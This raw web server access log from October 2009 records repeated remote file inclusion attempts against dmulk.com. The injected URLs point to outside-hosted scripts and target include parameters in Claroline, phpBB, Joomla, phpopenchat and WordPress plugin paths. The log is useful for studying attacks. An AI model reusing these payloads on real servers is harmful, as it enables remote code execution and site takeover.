74.205.54.26 - - [30/Oct/2009:10:25:33 -0700] "GET /logs/index.php?redir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:25:35 -0700] "GET /logs/access_080815.log/index.php?redir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:25:36 -0700] "GET /index.php?redir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 200 15962 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:25:36 -0700] "GET /logs/index.php?redir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:10:26:00 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:10:26:00 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:10:26:00 -0700] "GET /logs/access_080521.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:01 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:01 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:01 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:03 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:05 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:05 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:05 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:06 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:06 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:26:06 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:10:26:06 -0700] "GET /logs/access_080515.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:10:26:20 -0700] "GET /logs/access_080131.log/index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:10 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:10 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:10 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:27:14 -0700] "GET /logs/access_080302.log HTTP/1.0" 200 1917493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:10:27:14 -0700] "GET /logs/access_080531.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:10:27:17 -0700] "GET /logs/access_080530.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:27:19 -0700] "GET /appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:27:20 -0700] "GET /logs/access_080928.log//common/db.php?commonpath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:20 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:21 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:21 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:27:23 -0700] "GET /logs/access_080928.log//common/db.php?commonpath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:27:24 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:27:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:27 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:27 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:28 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:29 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:29 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:29 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:38 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /logs/access_080529.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:39 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:41 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:42 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:42 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:52 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:53 -0700] "GET /logs/access_090326.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:53 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:27:53 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:10:28:05 -0700] "GET /logs/access_080304.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:25 -0700] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:25 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:25 -0700] "GET /logs/access_090104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.151.175.10 - - [30/Oct/2009:10:28:27 -0700] "GET /logs/access_090106.log/index.php?pg=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:29 -0700] "GET /logs/access_090714.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:30 -0700] "GET /logs/access_090104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:30 -0700] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:30 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:10:28:34 -0700] "GET /logs/access_090714.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:44 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:44 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:44 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:28:46 -0700] "GET /logs/access_080928.log//common/db.php?commonpath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:46 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:46 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:47 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:28:48 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
